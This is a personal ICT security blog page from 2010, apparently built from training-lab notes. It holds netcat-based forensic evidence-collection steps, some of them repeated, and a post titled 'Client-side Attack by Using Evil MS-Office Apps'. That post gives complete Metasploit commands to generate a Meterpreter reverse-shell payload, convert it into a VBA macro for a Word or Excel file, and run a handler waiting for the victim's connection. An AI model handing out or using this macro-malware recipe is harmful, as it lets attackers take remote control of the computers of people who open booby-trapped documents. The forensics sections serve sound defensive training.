Dear All,
As of today. My personal blog has been moved to http://flexi-learn.blogspot.com
New posts will be updated soonest possible.
Semi Yulianto's Personal Blog
Dedicated to ICT Security and other related interests
Monday, July 26, 2010
Thursday, June 24, 2010
Covert Analysis II (Forensics)
On LON-WEB1, open the Event Viewer mmc snap-in, select System Event then select Save Logfile As, save the system event with another name:
Example: C:\Backup\SysEvent-Backup.evt
from LON-WEB1, send the SysEvent-Backup.evt file to CHFI-XP2 machine:
D:\Forensics\Netcat>
nc -v 131.107.1.254 99 < C:\Backup\SysEvent-Backup.evt
from CHFI-XP2 machine, receive the file:
C:\Tools\Netcat>
nc -v -L -p 99 -w 60 > E:\Evidence\SysEvent-Backup.evt
To analyze:
On CHFI-XP2, open Event Viewer and load the file to view the events.
Example: C:\Backup\SysEvent-Backup.evt
from LON-WEB1, send the SysEvent-Backup.evt file to CHFI-XP2 machine:
D:\Forensics\Netcat>
nc -v 131.107.1.254 99 < C:\Backup\SysEvent-Backup.evt
from CHFI-XP2 machine, receive the file:
C:\Tools\Netcat>
nc -v -L -p 99 -w 60 > E:\Evidence\SysEvent-Backup.evt
To analyze:
On CHFI-XP2, open Event Viewer and load the file to view the events.
Overt Analysis (Forensics)
Use mmc on the CHFI-XP2 machine and connect to the evidence machine (LON-WEB1).
Launch the mmc with runas:
C:\>runas /user:LON-WEB1\administrator "mmc"
Once mmc has been launch, connect to the evidence machine.
Link:
Forensics Acquisition Utility (FAU)
http://gmgsystemsinc.com/fau/
Launch the mmc with runas:
C:\>runas /user:LON-WEB1\administrator "mmc"
Once mmc has been launch, connect to the evidence machine.
Link:
Forensics Acquisition Utility (FAU)
http://gmgsystemsinc.com/fau/
Covert Analysis I (Forensics)
On CHFI-XP2, launch Netcat in Listening Mode:
C:\Tools\Netcat>nc -v -L -p 99 >> E:\Evidence\MyEvidence.txt
On LON-WEB1, launch Netcat in Client Mode:
D:\Forensics\Netcat>date /t | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>time /t | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>ipconfig /all | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>netstat -an | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>nbtstat -n | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>arp -a | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>route print | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>tasklist | nc 131.107.1.254 99 -w10
Display registry values:
D:\Forensics\Netcat>reg query hklm\software\microsoft\windows\currentversion\run | nc 131.107.1.254 99 -w10
If you need to launch Netcat from different directory,
access it by using this command:
D:\Forensics\>cd Sysinternalssuite
D:\Forensics\Sysintenalssuite>pslist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psloggedon | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psloglist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psservice | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psfile | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>pipelist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>listdlls | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>procfeatures | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
MyEvidence.txt is the file which will store the evidence collection.
C:\Tools\Netcat>nc -v -L -p 99 >> E:\Evidence\MyEvidence.txt
On LON-WEB1, launch Netcat in Client Mode:
D:\Forensics\Netcat>date /t | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>time /t | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>ipconfig /all | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>netstat -an | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>nbtstat -n | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>arp -a | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>route print | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>tasklist | nc 131.107.1.254 99 -w10
Display registry values:
D:\Forensics\Netcat>reg query hklm\software\microsoft\windows\currentversion\run | nc 131.107.1.254 99 -w10
If you need to launch Netcat from different directory,
access it by using this command:
D:\Forensics\>cd Sysinternalssuite
D:\Forensics\Sysintenalssuite>pslist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psloggedon | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psloglist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psservice | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>psfile | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>pipelist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>listdlls | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\Sysintenalssuite>procfeatures | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
MyEvidence.txt is the file which will store the evidence collection.
Tuesday, May 18, 2010
Client-side Attack by Using Evil MS-Office Apps (Excel or Word)
Step 1: Create your own payload
cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=131.107.1.252 LPORT=443 X > /tmp/payload.exe
Step 2: Convert your newly created payload to VBA (Visual Basic for Application) script
cd /pentest/exploits/framework3/tools
./exe2vba.rb /tmp/payload.exe /tmp/payload.vba
Step 3: Copy and Paste the contents of the payload to your evil file
Open your evil file (Excel or Word). Select: Tools > Macro > Visual Basic Editor, paste the contents of your payload.vba, then save the file.
Step 5: Wait for the reverse connection from the client
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit
Friday, May 14, 2010
ECSA/LPT @ ECDC Photos
Guys, download our photos from here:
http://www.4shared.com/account/photo/pefTq93p/DSCN1014.html
http://www.4shared.com/account/photo/_AmTe_3S/DSCN1015.html
http://www.4shared.com/account/photo/pefTq93p/DSCN1014.html
http://www.4shared.com/account/photo/_AmTe_3S/DSCN1015.html
Subscribe to:
Posts (Atom)